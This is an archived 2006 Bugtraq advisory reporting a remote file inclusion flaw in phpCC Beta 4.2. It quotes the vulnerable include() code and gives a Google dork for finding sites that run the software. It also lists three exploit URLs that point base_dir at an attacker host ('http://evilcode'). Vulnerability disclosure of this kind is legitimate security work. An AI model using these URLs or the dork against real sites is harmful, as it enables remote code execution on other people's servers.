lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060806123046.16660.qmail@securityfocus.com>
Date: 6 Aug 2006 12:30:46 -0000
From: chris_hasibuan@...oo.com
To: bugtraq@...urityfocus.com
Subject: SolpotCrew Advisory #6 - phpCC - Beta 4.2 (base_dir) Remote File
 Inclusion

#############################SolpotCrew Community################################
#
#        phpCC - Beta 4.2 (base_dir) Remote File Inclusion 
#
#        Download file : http://www.phpcc.at/download_file1.html
#
#################################################################################
#
#
#       Bug Found By :Solpot a.k.a (k. Hasibuan) (06-08-2006)
#
#       contact: chris_hasibuan@...oo.com 
# 
#       Website : http://www.solpotcrew.org/adv/solpot-adv-05.txt
#
################################################################################
#
#
#      Greetz: choi , h4ntu , Ibnusina , r4dja , No-profile , begu , madkid
#              robby , Matdhule , setiawan , m3lky , NpR , Fungky , barbarosa
#              home_edition2001 , Rendy , cow_1seng , ^^KaBRuTz , bYu , Lappet
#              Blue|spy , cah|gemblung , Slacky , blind_boy
#              and all member solpotcrew community @ http://solpotcrew.org/forum/
#
#
###############################################################################
Input passed to the "base_dir" is not properly verified 
before being used to include files. This can be exploited to execute 
arbitrary PHP code by including files from local or external resources.

code from login.php

<?php
define('PHPCC', true);
define('SITE', 'login.php');

include($base_dir."includes/common.php");
include($base_dir."includes/header.php");

switch( $_GET['action'] )

code from reactivate.php

define('PHPCC', true);

include($base_dir."includes/config.php");
include($base_dir."includes/constants.php");
include($base_dir."includes/functions.php");
include($base_dir.'includes/sessions.php');

if( $_POST['submit'] == true )

code from register.php

<?php
define('PHPCC', true);
define('SITE', 'register.php');

include( $base_dir . "includes/common.php" );
include( $base_dir . "includes/header.php" );

Google dork : "Powered by phpCC Beta 4.2"

exploit : http://somehost/login.php?base_dir=http://evilcode
          http://somehost/reactivate.php?base_dir=http://evilcode
          http://somehost/register.php?base_dir=http://evilcode

##############################MY LOVE JUST FOR U RIE#########################
######################################E.O.F##################################

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ